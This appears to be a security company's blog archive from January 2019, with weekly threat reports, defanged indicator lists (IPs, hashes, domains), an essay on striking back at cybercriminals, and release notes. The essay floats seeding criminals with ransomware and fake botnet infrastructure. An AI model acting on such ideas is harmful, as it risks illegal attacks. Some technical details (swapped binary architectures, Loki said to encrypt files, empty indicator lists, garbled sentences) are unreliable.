  - 118.97.55[.]101

  - 119.40.84[.]155

  - 119.73.133[.]87

  - 120.28.151[.]44

  - 120.29.125[.]194

  - 121.235.3[.]65

  - 121.7.226[.]57

  - 122.117.162[.]61

  - 122.144.11[.]195

  - 122.96.208[.]32

  - 125.165.180[.]211

  - 144.202.60[.]94

  - 152.169.218[.]80

  - 162.244.80[.]47

  - 162.244.81[.]232


  - 175.106.11[.]179

  - 176.152.38[.]195

  - 185.105.4[.]172

  - 185.105.4[.]183

  - 185.244.25[.]201

  - 190.6.141[.]59

  - 202.162.204[.]36

  - 202.86.222[.]4

  - 203.129.22[.]119

  - 203.160.63[.]125:

  - 203.177.173[.]46

  - 219.74.127[.]169

  - 223.197.212[.]15

  - 36.37.220[.]57

  - 36.66.16[.]117

  - 36.89.106[.]19

  - 45.124.15[.]48

  - 46.8.209[.]105

  - 58.212.57[.]219

  - 65.127.187[.]7

  - 67.205.154[.]69

  - 74.93.73[.]169

  - 83.208.108[.]189

  - 85.197.162[.]91

  - 95.27.246[.]66

Second stage IP


C2 Domain


Binary info

cock.x86 (ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped)

md5 - 7cd9788dd9a5e97ca2e0a0480d4c377a  

sha256 - e5173e4e4a1044858a14002a45507bb75772b21ceb348488bef465c2d22b791d

cock.mpsl (ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV))

md5 - 283d4888af0d820ba1d6f72e586a8410  

sha256 - 96ecc0e9b9e6f4f0275c4041e128d5ee87b51148e0e74b0379ece5edebb22792

The Lesson of the Limping Lady

on January 31, 2019

What does any sane individual do when they find themselves on the losing side of a war? Look at any history book and the answer is quite evident: fight dirty. Cheap tricks, a punch 👊 below the belt – whatever it takes to claw back some advantage. And why shouldn’t a defender left with few options decide to fight nasty?

Indeed, the entire world of spycraft and sabotage was born through such events. Legends were made from stories such as the trojan horse or Washington’s crossing of the Potomac.

Throughout World War II, and especially during the German advance throughout Europe, the Allies were bereft of options outside of sabotage or guerilla warfare. And so, the Axis enemy got the dirty fight it was asking for: the proverbial kick to the ol’ manhood. By a woman. With a wooden prosthetic she affectionately named ‘Cuthbert’ ❤️.

I kid you not.

The story is so amazingly interesting and inspiring, when Tom Hanks turns this into the next hit war movie, just remember: you heard about it here first ☝️.

While there were many Allied resistance operators throughout the war, none were held in such contempt by the Nazis than Virginia Hall, more affectionately known by Hitler’s henchman as the “Limping Lady”. Or, as Klaus Barbie, the head hauncho of the Gestapo called her: “that limping Canadian b—ch.” That poor bad guy sounds a little butthurt 🙃. So would you if you got “kicked” by a wooden Canadian prosthetic named Cuthbert.

Throughout Hall’s illustrious career, she was the cause for more sabotage missions, troop movement leaks, jailbreaks, and other nefarious deeds than any other spy in World War II history. Oh, and news flash to you Mr. Barbie: Hall wasn’t even Canadian. Which makes sense because nobody doesn’t like a Canadian.

Are we losing the good fight?

The good fight

So, what does this have to do with cybersecurity? Just this: we seem to be fighting a war we aren’t winning. I won’t bore you with the statistics (💤). Go to any security conference keynote and you can hear the speaker wax long and elegant with all their beautiful bar chart wizardry.

But we know this: we aren’t winning. Our adversaries are on a constant onslaught from basic low-intelligence scams up to sophisticated nation-state threat actors. And we’ve paid a heavy toll for their misdeeds; namely – we’ve turned into mouse-chasing cats. As the old adage goes (which I’ve just now made up), where the mouse goes, so does the cat 🙀.

Unlike Virginia Hall, most of us are so heads down in responding and reacting to threats, we don’t ever take the time to look up and ask ourselves a simple question:

If bad guys are so painful to us, how can I inflict pain back up on them? 💁

When you’re backed into a corner, that is the time to fight back. That’s how a fight gets dirty. And I’m not talking about hack-back. That was so 2014 era passé.

I’m talking about taking a page from Hall’s book. Ignore the rules of engagement for a minute and let’s go through a thought exercise. What can we do to make life hard for the bad guys that make life hard for us? While we may not be as brazen and bold as Hall, springing jailbreaks and sabotaging tanks, we can still think outside the box in some innovative ways. Here’s a few ideas that might strike your fancy. I’m going to call these Cuthbert’s Kicks, simply because Hall is such a BA and you better not mess with anyone who would name their artificial leg Cuthbert.

Cuthbert’s kick #1: Mule burning for fun and profit

Kick #1

I talked to an innovate banker one time that came up with an ingenious way of pushing major pain back onto his cyber miscreants. He once asked me, “Hey Wes, you know all those wire fraud scams that banks face where a fraudulent email “from the CEO” emails the CFO requesting a wire to be sent out?”

Of course, I have. They have been a huge issue for years. Rather than simply ignoring the emails, this brilliant banker made the fight dirty. He actually responds back to the bad guy.

“We actually stood up an email account to reply back to the fraudster. We act like we’ve fallen for the bait and we’re going to initiate the wire. But in all actuality, we’re simply tricking him into giving up the wire instructions. In nearly every case, the wire account belongs to a money mule. We notify the other bank that holds that account for the mule so they can get the account shut down.”

Now this is an interesting way to make a fraudster angry – and worse, will truly sabotage their miscreant operation. The banker explains: “It takes months, and sometimes years for these fraudsters to build up their repertoire of mules. When we reply back and get the fraudster to expose their mules, we can burn those accounts and truly make life difficult for them. These bad guys fall for it every time, and it makes me so happy to know I’m truly fighting them back.” 🙌

Cuthbert’s kick #2: Feed that deep dank dark Web

Kick #2

The Dark Web is all abuzz these days. All the radio ads I hear tell me about how our PII are hiding in the ‘deep dark Web’ (shocker) ready for any seedy neckbeard in a fedora to gobble up. But when we deconstruct the hype, there is a healthy (can I call it that?) and active criminal market place with a supply chain for anything a cybercriminal might want. Shameless plug: I even made a video about it many years ago.

Now ask yourself this: Why do these bad guys use Tor? Simply this: the anonymity it provides. It’s an excellent place to sell your wares and pop off about what dark deeds ail you. Oh, and it’s also a great place for us to push some pain back to the baddies. Here’s one idea.

Did you know password dumps are often left on pastebin and dark Web forums? Why don’t we take advantage of that anonymity? One security practitioner I know does something innovative with it. “We occasionally like to feed a password dump into these places with fake credentials. Bad guys don’t know they’re fake. But we sure do – we created them after all.”

When pressed on why he does this, his response was one for the record books: “We wait for a few days and then search the SIEM for logins attempting to use these fake credentials. From there, we can cross-correlate for legitimate logs and hunt down compromised accounts.” Now that is some outside the box thinking if ever I’ve heard of one.

Cuthbert’s kick #3: Ripping a page out of the MPAA’s playbook

Kick #3

Remember the time that the MPAA got caught seeding fake movie torrents to expose those pesky internet pirates? Maybe they were on to something. What if we did the same thing? There’s lots of opportunity here.

How much fun could we have uploading and selling malicious malware to miscreants? What if we sold them software that ransomed their own computers? What if we provided fake C2 infrastructure (e.g. botnets) that burned their identities? How would they be any wiser? While much of this might borderline into criminal activity on our own, it’s still an innovative idea that might be worth exploration. Perhaps, our fine friends in the federal government are already doing this 😉.

Cuthbert’s final kick: Killing time

The final kick

There’s one way we can all make bad guys hurt: waste their time, while not wasting our own. There’s a lot of ways we can do this, and I can’t wait to share a few with you. If we want to remove appeal for these miscreants, we need to also remove their opportunity. Here’s a few fun ways others have done this. (A lawyer made me say this: I would caution you to not get involved directly with any fraudster unless you know the risks involved.)

Final lesson

Virginia Hall was a notorious thorn in the side of her enemies. Anyone the Nazis call a “limping Canadian b—ch” is a sure winner in my book. While we all struggle with our common adversaries, perhaps it is time for us to think a bit more outside the box. Bad guys place enough pain on us, perhaps it’s time we think about pushing some pain back upon them 💯.

What about you? What ideas do you have? Anything innovate and fun you’ve done to kick those miscreants where the sun don’t shine? We’d love to hear!

Threat Report Wednesday January 30th 2019

on January 30, 2019

Discover a financial service data breach, a viral Apple vulnerability, the evolution of malware, and indicators related to the Iranian DNS hijacking campaign in this week’s threat report.

Discover discloses August 2018 data breach

Discover Financial Services notified customers and the California Attorney General of a data breach. On August 13, 2018, they learned that an undisclosed number of Discover card accounts may have been part of a data breach, however, the breach “did not involve Discover card systems.” The company is issuing new cards for affected customers and advises cardholders to monitor their accounts for fraudulent activity.

Discover commented, “We can confirm this incident did not involve any Discover systems and we are forwarding this to the appropriate parties for review. We’re aware of a possible merchant data breach & are monitoring accounts. Our members can rest assured they’re never responsible for unauthorized purchases on their Discover card accounts.”

The breach was filed in two separate breach notifications. The statements differ slightly in the Automatic Bills section. One titles the section “A Helpful Reminder About Automatic Bills,” and encourages users to use the included list to contact merchants that bill their card automatically or store card information. The other titles the section, “Make sure any other automatic bills get paid as easily as these,” and states that there’s no need to contact the merchants listed, but if users have other automatic bills not on the list, they should contact them and update account information accordingly. Another difference between the two is that only some customers were issued a card with a new account number, while other customers were not. It sounds like it was a breach of systems used for automated billing that are outside of Discover. Users were advised to monitor their banking statements for fraudulent activity.

Apple disables group FaceTime

Apple has disabled Group FaceTime since a severe iOS bug was disclosed via Twitter (January 28, 2019). The bug allows iPhone users to access the microphone and front-facing camera belonging to the person they are calling even if the person does not answer the call.

The flaw received global attention when Apple iPhone user Benji Mobb tweeted a video of the bug in action. Within 24 hours, the post reached 30K+ retweets and over 75K likes.

A spokesperson for Apple reported that they are aware of the issue and plan to release a software update later this week. iPhone users are advised to disable FaceTime until the latest available patch is officially released by Apple and keep software up to date in order to best mitigate risk.

BankBot Anubis learns Chinese and adds Telegram for C&C

Researchers tracking BankBot Anubis noticed two significant changes in C&C tactics. BankBot Anubis is a mobile banking trojan that targets hundreds of unique mobile applications from organizations worldwide. Researchers observed BankBot Anubis encoding C&C information using Chinese characters in addition to base64 encoding in an attempt to hide their C2 infrastructure. Also, researchers noted the use of Telegram Messenger in addition to Twitter for communicating C&C URLs. This offers BankBot the use of public channels to broadcast messages to large audiences with a public URL.

Formbook information stealer distributed through file hosting service

Deep Instinct reports sightings of attackers using a file hosting service to distribute Formbook, an information/credential stealing malware. The observed attacks began with a phishing email containing a malicious attachment. In one analyzed case, the initial infection was carried out via a malicious RTF document that exploited CVE-2012-0158 (Office ActiveX vulnerability) and CVE-2017-11882, the Equation Editor vulnerability previously used by Loki.

After opening the maldoc, the malware was dropped and executed. It copies itself and writes an auto-run entry, ensuring persistence and boot-survival on infected machines. Formbook scans the victim’s system for passwords and sends them back to its C2 server. It can also take screenshots of the victim’s desktop and logs key strokes. The domain that served the payload was recently registered (files.dropmybin[.]me) on January 19, 2019, and employs Cloudflare, a popular reverse-proxy provider, to hide its real IP address. Deep Instinct notes that customers in retail and hospitality sectors in North America have been targeted. The following indicators of compromise were released with the researchers’ findings:













AZORult masquerading as Google Update

Minerva Labs observed the AZORult information stealer and downloader malware strain that is posing as a signed Google Update installer on compromised machines. AZORult is a data-stealing trojan also known to act as a downloader for other malware payloads. Minerva Labs disclosed the flaw after they detected a “suspicious executable” with a valid certificate. Minerva Labs also noticed that the actors had been executing the exploit through a “GoogleUpdate.exe” which pretends to be a legitimate updater, however, the certificate with which the malicious file was signed did not belong to Google.

Researchers have identified the camouflaged Google Update binary based on multiple patterns: HTTP POST request to a /index.php it made, using a “.bit domain” (for DNS over blockchain) and Typical User-Agent Mozilla/4.0. Researchers note that the capability of the AZORult replaces the legitimate Google Updater to run administrative privileges and allows it to establish a stealthy persistence mechanism. Users and organizations best defense against these attacks is to keep the software up to date and download applications in legitimate stores. Here are a few of the indicators of compromise released with the report. Check out the full report for all the file hashes.

File Paths




Iranian DNS hijacking infrastructure identified

Last week, researchers published further findings into the global DNS hijacking activity, allegedly conducted by Iran. Five attacker owned domains were used in the clandestine change of NS records, to act as nameservers to route traffic temporarily for targeted entities.

Once hijacked, targeted domains ceased resolving to their normal IP addresses and began resolving to actor-controlled infrastructure. The actors mostly used Let’s Encrypt certificates for TLS encryption. Available data shows that most affected domains were hijacked for very short periods of time, sometimes a day or less, with one domain showing resolutions to a malicious IP address for over a month. Researchers identified dates when the nameservers were used to route traffic to malicious IP addresses.

142.54.179[.]69February 2017Jordan (Government) 

89.163.206[.]26February 2017Jordan (Government) 

185.15.247[.]140December 2017 and January 2018Kuwait (Government) and Albania (Government) 

146.185.143[.]158August 2018UAE (Government) 

128.199.50[.]175September 2018UAE (Unidentified Sector) 

185.20.187[.]8September 2018UAE (Law Enforcement) and UAE (Government) and Lebanon (Government) and Lebanon (Civil Aviation) 

82.196.8[.]43October 2018Iraq (Government) 

188.166.119[.]57October 2018 and November 2018Egypt (Government) and Libya (Government) 

206.221.184[.]133November 2018Egypt (Government) 

37.139.11[.]155November 2018UAE (Unidentified Sector) 

199.247.3[.]191November 2018Iraq (Government) and Albania (Government) 

185.161.209[.]147November 2018Lebanon (Insurance) 

139.162.144[.]139December 2018Jordan (Government) 

37.139.11[.]155December 2018UAE (Unidentified Sector) 

178.62.218[.]244December 2018UAE (Government) and Cyprus (Government) 

139.59.134[.]216December 2018Sweden, Saudi Arabia and Lebanon (Internet Services) 

82.196.11[.]127December 2018Sweden and U.S. (Internet Infrastructure) 

46.101.250[.]202December 2018 and January 2019Saudi Arabia (Government) 

This large-scale activity shows the determination of nation state actors to reroute internet traffic for surveilling targets and gleaning information from that traffic. The rerouted traffic may have been used to steal session information, access sensitive information, and/or infect victims with malware. DNS hijacking poses a risk to the users of Web service and the confidentiality, integrity, and availability of the data in the service behind a hijacked domain.

NS Domains






Threat Report Wednesday January 23rd 2019

on January 23, 2019

Governments around the world were busy responding to cybercrime, cyber espionage, and hacktivists last week. The U.S. Department of Homeland Security issues an emergency directive, Zimbabwe draws unwanted attention from Anonymous, the Bahamas’ government TV network struggles to recover from ransomware, an APT lures Chile’s ATM network to infection, and South Korean security controls leads to secrets breach. Also, we got a hat-trick of remote code execution going on this week. Linux, Apple, and Windows released patches for critical vulnerabilities.

Emergency directive from U.S. Homeland Security

The U.S. Department of Homeland Security (DHS) has issued an emergency directive that requires all U.S. agencies that operate with a dot gov domain or agency-managed domain to audit their DNS records and servers to verify that they are resolving to the correct IP addresses. They also require such organizations to harden the security related to DNS accounts and passwords.

The directive comes after DHS’ monitoring of an ongoing campaign where attackers are stealing DNS administrators’ credentials in order to tamper with DNS infrastructure. Attackers are then redirecting government hostnames to attackers’ IP addresses. This allows attackers to possibly redirect legitimate traffic to phishing sites where more credentials can be stolen, or to have email delivered to the attackers’ mail servers.

The links in the emergency directive indicate that these attacks are related to earlier DNS hijacks reported by Cisco Talos in December 2018 and FireEye in January 2019. In these attacks, attackers known to be affiliated with Iran were hijacking the DNS records for Middle Eastern government domains.

U.S. Government agencies are required to perform the following steps within the next 10 business days. These procedures do not currently have a termination date and will continue until a further directive is issued:

  1. Audit DNS records associated with government domains to verify that they have not been tampered with and are directing traffic to the correct IP addresses.
  2. Change the passwords for DNS admin accounts that modify DNS records.
  3. Add multi-factor authentication to all DNS admin accounts.
  4. Begin to monitor the Certificate Transparency (CT) logs for agency domains that will be provided by DHS within the next 10 business days.

#OpZimbabwe underway

International hacktivist group, Anonymoustargeted Zimbabwe government after the Zimbabwe government attempted to halt nationwide protests through various means, including blocking social media sites. Here is an excerpt from the tango down:

“We have seen people being oppressed for fighting for freedom. We cannot tolerate that. As we did with the Sudanese government, we have successfully taken down 72+ Zimbabwe government websites. This is only a start. Your banking system will also fall soon. Zimbabwe government, you have become an enemy of Anonymous! Your systems are in danger!”

According to Bloomberg, the protests have been directed towards a 150 percent hike in the price of diesel and gasoline, police crackdowns resulting in the death of 12 people, and legal action directed at the three mobile networks to block access to Facebook, WhatsApp, YouTube, and Twitter. Some of the websites which have been targeted by Anonymous are: Ministry of ICT, Housing Ministry, Justice Department, and Ministry of Defense. The group reportedly attacked more than 200 websites in Sudan and government services for electronic payments.

PowerRatankba infiltrates Interbank ATM network via LinkedIn and Skype

Meanwhile in Chile, new information is coming out about an intrusion impacting the bank responsible for the country’s ATM network. Redbanc is an interbank network in Chile connecting the ATMs of all its banks. Earlier this month, it was reported they suffered an intrusion. Hackers created a watering hole to lure software developers by posting a sweet job opportunity on LinkedIn. When a Redbanc employee responded to the job opportunity, they were invited to a Skype interview. There they were instructed to download ApplicationPDF.exe, which contained malware. Redbanc did detect malware activity, allowing them to respond before attackers could learn the network and do more damage. This shows the value of monitoring your network to detect threats early, before they mature. Researchers at Flashpoint provided a great malware analysis of the samples from Redbanc and believe Lazarus, aka Hidden Cobra, is responsible.

TV network take over in the Bahamas

Like a scene out of a cult classic, Hackers have taken over the TV network infrastructure for Bahamas’ Corporation for Broadcasting’s (CBC). Much of the IT infrastructure for the station is unavailable as hackers hold the computer network ransom. The ransomware infiltration was nearly complete in scope. The attackers initially asked for 50,000 dollars in cryptocurrency (approximately 15 bitcoin), but have been willing to negotiate down to 18,000. Although recovery is expected to take hundreds of thousands of dollars, the ransom has been declared off the table.

As reported by EW News Online, The Democratic National Alliance (DNA) expressed that it is gravely concerned about recent reports regarding a cyberattack on the Broadcasting Corporation of the Bahamas (BCB), and Bahamians being left in the dark as it relates to getting an update. DNA’s Spokesperson for Information Technology, Samuel Strachan, outlined that no further updates have been provided to the Bahamian people and fundamental questions remain unanswered by a government that professes a commitment to transparency and accountability. I reached out to BCB earlier in the week for clarification on some of the breach details, but I have received no update.

South Korea was hacked. Who done it?

According to multiple South Korean news sources, attackers successfully infiltrated the computer systems of a South Korean government agency on October 4, 2018, infecting 30 computers and stealing internal documents from at least 10. The breached organization was South Korea’s Defense Acquisition Program Administration (DAPA), an agency responsible for weaponry and munitions acquisitions for the country’s military forces. The stolen documents reportedly contained information on arms procurement for the country’s next generation fighter aircraft.

Ironically, attackers were able to infiltrate the system by first gaining access to the server of a security program installed on all government computers. The infected application was a “Data Storage Prevention Solution” installed on South Korean government computers to prevent sensitive documents from being downloaded and saved on internet-connected PCs. Upon gaining administrative access to the software’s server, attackers used to it collect documents from connected workstations. I’ll go out on a limb and say this was North Korea.

Linux, Apple, and Microsoft plug critical code execution holes

Linux, Apple, and Microsoft are patching some critical vulnerabilities that allow for remote code execution (RCE).

Linux package manager APT released a patch for a remote code execution vulnerability that allows a man-in-the-middle to execute arbitrary code as root on a machine installing any package. “Unfortunately, the HTTP fetcher process URL-decodes the HTTP Location header and blindly appends it to the 103 Redirect response,” explained Jusicz in his post. “Since the attacker controls the reported hashes, they can use this vulnerability to convincingly forge any package.” The flaw (CVE-2019-3462) has been fixed in the latest versions of the package manager. The developers of APT, Debian, has acknowledged the flaw. Jusicz also advises users to disable HTTP redirects when updating. This way the flaw is rendered invalid for the meantime until Debian updates their APT package.

Apple has released patches for a number of vulnerabilities, but notable among them is a vulnerability in WebRTC that opens the door for an RCE over facetime and a vulnerability that allows Bluetooth connections to be intercepted and used for RCE on the device. Since it’s 2019, you can buy working exploits for either of these vulnerabilities for as low as $4,999.99. What a world we live in.

Microsoft has released temporary patches for three Windows zero-days, all of which were disclosed within the past month. The first received a temporary patch last week, while patches for the other two followed this week. ZDNet notes that Microsoft did not release official fixes at the start of the month during its January 2019 Patch Tuesday, and that the patches have instead been made available by a third-party security firm. In order to install the temporary patches, users must install 0patch Agent from Acros Security, software primarily designed for companies that use old Windows versions across their system, versions that have reached their End-Of-Life (EOL) and are no longer receiving official security updates from Microsoft.

The first zero-day is a flaw within Windows ReadFile, whereby malicious code can abuse the Windows ReadFile OS function to read any local file, regardless of the user’s permission level. It was disclosed on December 20, 2018.

The second zero-day is a Windows WER flaw, aka AngryPolarBug, whereby malicious code can overwrite and replace any file on the user’s system. It was disclosed on December 27, 2018.

The third zero-day is in Windows VCF (Contacts), whereby malicious code abuses the way Windows reads vCard files (VCFs) to execute code on the computer with elevated privileges. It was disclosed on January 10, 2019.

None of the three Windows zero-days have been observed being used in the wild by any malware author or cybercriminal group. Users and organizations are advised to update their Windows products with the latest available patches to mitigate risk and remain on watch for more permanent patches.

Link High Technologies and Perch Security Partner to Bring Added Security to MSP Clients

Perchy on January 17, 2019

Link High Technologies, a cybersecurity and compliance focused IT management provider, is excited to announce its partnership with Perch Security. Through this partnership, Link High’s information security offerings will now include Perch Security’s next generation threat intelligence platform and Security Operations Center (SOC) services.

Access the rest of the article here.

Threat Report Wednesday January 16th 2019

on January 16, 2019

A lot has happened over the last week, so we have a bit more to cover than usual. The malspam campaigns are getting more creative than ever and some recent news about Ryuk ransomware attribution could have a big impact on your cyber insurance coverage.

Love-Letter malspammer, “always thinking about you”

With Valentine’s day right around the corner, the “Love Letter” malspam campaign is using email subject lines engineered to tug user’s heartstrings into infection with GandCrab Ransomware, XMRig miner, and Phorpiex spambot. Here were some example subject lines:

  • This is my love letter to you
  • My love letter for you
  • Wrote the fantasy about us down
  • Always thinking about you

The campaign contains ZIP attachments, which contain a JavaScript file that runs a PowerShell command, resulting in a download of an executable named “krablin.exe from “”. Once executed, the malware will be copied to “%UserProfile%\[number]\winsvcs.exe” and downloads five other malware samples to the infected machine and executes them. Users should always be cautious when viewing email content that pretends to be legitimate from a company and asks for personal information to avoid any potential attacks. The following indicators of compromise were released by bleeping computer.

























Email Addresses 

IP Addresses 



Mjag pairs up with Punisher RAT

Zscaler security firm released a report for a variant dubbed “Mjag dropper” that is using decoy documents to deliver Remote Access Trojan (RAT). Mjag dropper is compiled in the Microsoft .NET framework and its original binary is obfuscated using Smart Assembly. Zscaler disclosed the flaw after they detected the infection cycle involving Punisher RAT. The malware is publicly available and can be configured with a range of features: Password stealing module, Anti-task manager, Keylogging, Persistence, Spreading vector, and AV checks. The following indicators of compromise were released with these findings.








DarkHydrus grows back new heads in on-going Middle East campaign

The DarkHydrus campaign reemerged and is targeting Middle East entities. 360 Threat Intelligence Center identified that the attackers use VBA macros in the dropper, with DNS tunneling for C2 communication. The malware was uploaded to VirusTotal from Oman.




IP Addresses 

Ryuk moves to Russia with Grim Spider

Multiple security intelligence communities, like CrowdStrike, report that Ryuk ransomware is most likely the creation of Russian financially-motivated cybercriminals, not North Korean state-sponsored attackers. The clarification came after several news outlets attributed a Ryuk ransomware infection targeting U.S. newspaper agencies to North Korean attackers.  We have previously reported on Ryuk activities and the U.S. newspaper hack

The ransomware was created by a threat actor, which Crowdstrike calls Grim Spider, who allegedly bought a version of Hermes ransomware from an underground forum and modified it into Ryuk ransomware. The confusion possibly stems from North Korea state-sponsored actors reportedly infected the Far Eastern International Bank (FEIB) in Taiwan with Hermes ransomware in October 2017.

Researchers believe that North Korean attackers purchased the same Hermes ransomware kit, similar to Grim Spider, and deployed it on the bank’s network as a distraction in an attempt to cover their tracks. Researchers believe there is no connection between North Korean state-sponsored attackers and the Ryuk ransomware strain. Researchers note that multiple Ryuk ransomware victims were infected with TrickBot before Ryuk was deployed on their systems and speculate that attackers selected machines infected with Trickbot to deploy Ryuk.

Since Ryuk’s appearance in August, threat actors have earned 705.80 Bitcoin across 52 transactions, for a current value of $3,701,893.98. The following indicators of compromise were released with these findings.








Insurance Group declines payout for Russian attributed ransomware

Bloomberg shared their findings with ZDNet after they reported a lawsuit against Zurich Insurance Group by Mondelez in a bid to seek $100M in damages after an insurance claim that was not paid out in NotPetya attack. NotPetya is a type of ransomware similar to Petya. Researchers noticed that the actors had been executing the exploit through the use of the much-discussed and patchable EternalBlue and EternalRomance exploits of yesteryear to launch attacks. (Yes, these attack vectors are still being exploited today.)

Once executed, the malware will reboot the system and overwrite the master boot record (MBR) with a custom loader and a ransom note which demands $300 in Bitcoin. Researchers note that NotPetya impacted business worldwide including TNT, Ukrainian banks, energy companies, airports, and shipping giant Maersk. Users and organizations should enforce strong security awareness, recognize phishing attacks, exercise caution when clicking on malicious links, and deploy two-factor authentication to mitigate cyber attacks. No indicators of compromise were released with this report.

Zurich chose not to cough up the money, citing the NotPetya was, “hostile or warlike action in time of peace or war,” which voided the claim. The security industry will be following this case closely to set precedent around this topic. With Ryuk’s move to Russia will Tribune’s cyber insurance policy cover fallout from a Russian cyber cold war?

Which brings up a question for you: What would your cybersecurity insurer say if your organization suffers a ransomware attack? Now is a good time to open the discussion before an incident might occur.

After several cups of perch-olated coffee and a blood sacrifice, the Perch SOC successfully reviewed the activity and IOCs listed for each threat and found zero Perch customers subjected or targeted by these active threats for the last 30 days.

Release Notes

January 11, 2019

  • Allow MSSPs to manage themselves with ConnectWise
  • Upgrade Perchybana to use ELK 6.x and migrate data

  • Make user details visible to support admins
  • Allow support admin users to troubleshoot 2FA
  • Allow ConnectWise integration form fields to be null
  • Migration issues for ELK 6.x
  • Rotate Google Maps API key for sensor setup
  • Increase time allotted for intel to impact sensor health
  • Create missing team relationships on sign up

Threat Report Wednesday January 9th 2019

on January 9, 2019

It’s clear that ransomware is ruling the new year, so today we’re covering activity from three ransomware campaigns. We’ll also be checking out a recent 0day discovered in the wild that has been bringing home the cache for some lucky attacker. But first, let’s start with a high-profile data breach.

Humana healthcare provider discloses data breach

According to a breach notification filing with the California Attorney General’s Office, healthcare management provider, Humana, disclosed that attackers compromised an associate, Bankers Life, and stated that the incident impacted a limited number of Humana customers. The statement disclosed that between May 30 and September 13, 2018, an unauthorized actor used employee system credentials to gain access to certain secure Bankers Life websites, potentially granting them access to a limited number of customers’ information.

Potentially exposed information included name, address, date of birth, last four digits of their social security number, and health insurance policy coverage details. Bankers Life learned of the incident on August 7 and Humana was notified of the malicious activity on October 25, 2018. The number of customers impacted was not disclosed. Humana states that the offenders did not access full social security numbers, banking or credit card information, or personal health or medical records. But the data that was stolen is enough to social someone into identity theft. In public statements the company, shamelessly and ironically, recommends a Bankers Life identity protection service to the victims for identity theft protect. They couldn’t keep customer data secure before so what makes anyone think they deserve the right to more of your data. If they feel strongly about the suggested consumer response for the damage they have inflicted, they should be giving away the service to all of those affected.

Recent side channel 0day steals data from Operating System’s cache

Security researchers from Graz University of Technology, Boston University, NetApp, CrowdStrike, and Intel, shared their findings with Bleeping Computer about a new side channel attack that targets an Operating System’s page cache. Side channel attack is a race condition that fulfilled using a malicious process for a successful local attack.

Researchers disclosed the flaw to the affected vendors after they detected an exploitation attempt against Windows and Linux machines. Researchers noticed that the actors had been executing the exploit through a “page cache” named “minicore” dubbed CVE-2019-5489 on Linux and “QueryWorkingSetEx” on Windows. CVE-2019-5489 is a race condition that allows an attacker to observed page cache access patterns of other processes on the infected system.

Users and organizations should be ready to install security updates to limit their exposure to threats. No indicators of compromise were released with researchers’ findings, however, an in-depth technical analysis is available for review.

Vidar and GandCrab: Stealer and ransomware combo observed in the wild

Malwarebytes security researchers recently discovered a prolific malvertising campaign that targets high-traffic torrent and streaming sites and redirects users towards two malicious payloads. Malwarebytes noticed that the actors had been executing the exploit through two malicious payloads. First is Vidar, a malware that targets vast amounts of victims’ information. Second is GandCrab, one of the most active families of file-encrypting malware currently in operation. Once executed, the actors will send a ransom note demanding either Bitcoin or Dash in exchange for retrieving the files. Users and organizations must keep the software and firmware up to date with timely patch updates to prevent any potential attacks. The following indicators of compromise were released with Malwarebytes’ findings.


- Kolobkoproms[.]ug
- ovz1[.]fl1nt1kk[.]10301[.]vps[.]myjino[.]ru


- abf3fdb17799f468e850d823f845647738b6674451383156473f1742ffbd61ec
- e99daf10e6cb98e93f82dbe344e6d6b483b9073e80b128c163034f68de63be33

New wave MongoLock ransomware immediately deletes files

Trend Micro reports sightings of a new wave of MongoLock ransomware attacks, whereby files are immediately deleted instead of encrypted and further scans are automatically performed to delete additional files.

Researchers state that MongoLock was first sighted in the wild in December 2018. The ransomware message claims that the files are saved in the cybercriminals’ servers and demands a payment of 0.1 Bitcoin be paid within 24 hours.

Trend Micro states that the highest number of infections are in South Korea, Great Britain, the United States, Argentina, Canada, Germany, Taiwan, and Hong Kong. The campaign was sighted targeting databases with weak security settings, and the ransomware was hosted on PythonAnywhere, a Python-based online integrated development environment (IDE) and web hosting service. Researchers state that any host using hxxp://{user-defined} may be vulnerable to abuse. The following indicators of compromise were released with researchers’ findings.



IP Address



- hxxp://update[.]pythonanywhere[.]com/d
- hxxps://s[.]rapid7[.]xyz 

Loki variant new campaign: Uses ”.ace” attachments via fake DHL Express quotation

Security researchers shared their findings with My Online Security, after they observed the new campaign for Loki variant that targets victims via malicious documents to gather information. The malicious attachment named “.ace”, contains a password-stealing component that encrypts victim’s files. The following list of file extensions contains malicious attachment: js, exe, com, pif, scr, hta, vbs, wsf, jse, and jar. Researchers noticed that the actors had been executing the exploit through a “.ace” malicious file.

Once executed, it will encrypt victim’s files and the actors will demand for a ransom to recover the files. Users and organizations should always be cautious when viewing email content that pretends to be legitimate from a company and asks for personal information to avoid any potential attacks. The following indicators of compromise were released with researchers’ findings.


- 6e98fd04a2b9f62eb8682152fc93e60c
- 6a904e3d3449f6254364d2170719247c1356fd7c 

Is Cybersecurity the Death of Digital Marketing?

on January 8, 2019

Marketing has evolved tremendously since my days in college as an eager student. I listened intently as my professor explained things like the 4 P’s of marketing and mutually beneficial relationships, paired with acronyms like, WIFM and MRR. While these were relevant at the time, and still are in many aspects, things have changed… to say the least.

Facebook is the new Yellow Pages, and SEO is the new TV commercial. In other words, it’s technology or bust, baby. Marketing teams are now comprised of developers, engineers, and just all-around techy people. Job descriptions for “digital marketing manager” can barely fit into a Linked In post. Many organizations are having to create jobs to cover their basic marketing needs, but with a more technical twist. And while this candidate seems ideal to the CMO, often these people (and these positions) don’t even exist (yet).

It’s true that technology is fueling marketing agendas, strengthening communication, and creating a space where literally anything is possible. But, to this reward comes great risk, and as a starry-eyed marketing team, awareness means so much more these days when it comes to cyber breaches within a company.

Awareness leads to ROI… but also hackers

While the role of marketing has evolved, its goal has remained consistent: awareness.

So, what happens when your goal as a department is awareness, but this said awareness could potentially cause more harm than good? Enter the complicated relationship status of marketing and cybersecurity.

With an ever-growing need and move toward technology, marketers are at risk from the moment they craft that clever Tweet to when they hit send on their drip campaign. An exposed, vulnerable, easy-target just waiting to be attacked. Sharing passwords without a secure line like LastPass can quickly turn into a hacker’s dream come true. Submitting payments for upcoming tradeshows or sharing documents via Slack can all go from collaboration to corroboration… against your company.

“The marketing technology map today is dizzying, and the increase in technology solutions can expose companies to a great deal of risk. With the pressure on marketing teams to do more with less and to demonstrate program ROI, marketers are eager for new technology solutions to optimize their campaigns and to work more efficiently and effectively. But these solutions are not without risk.” (

That begs the question: In 2019, is it possible to be a great digital marketer without all the risk? It is. You just have to be one smart cookie.

Tracking cookies are crumbling

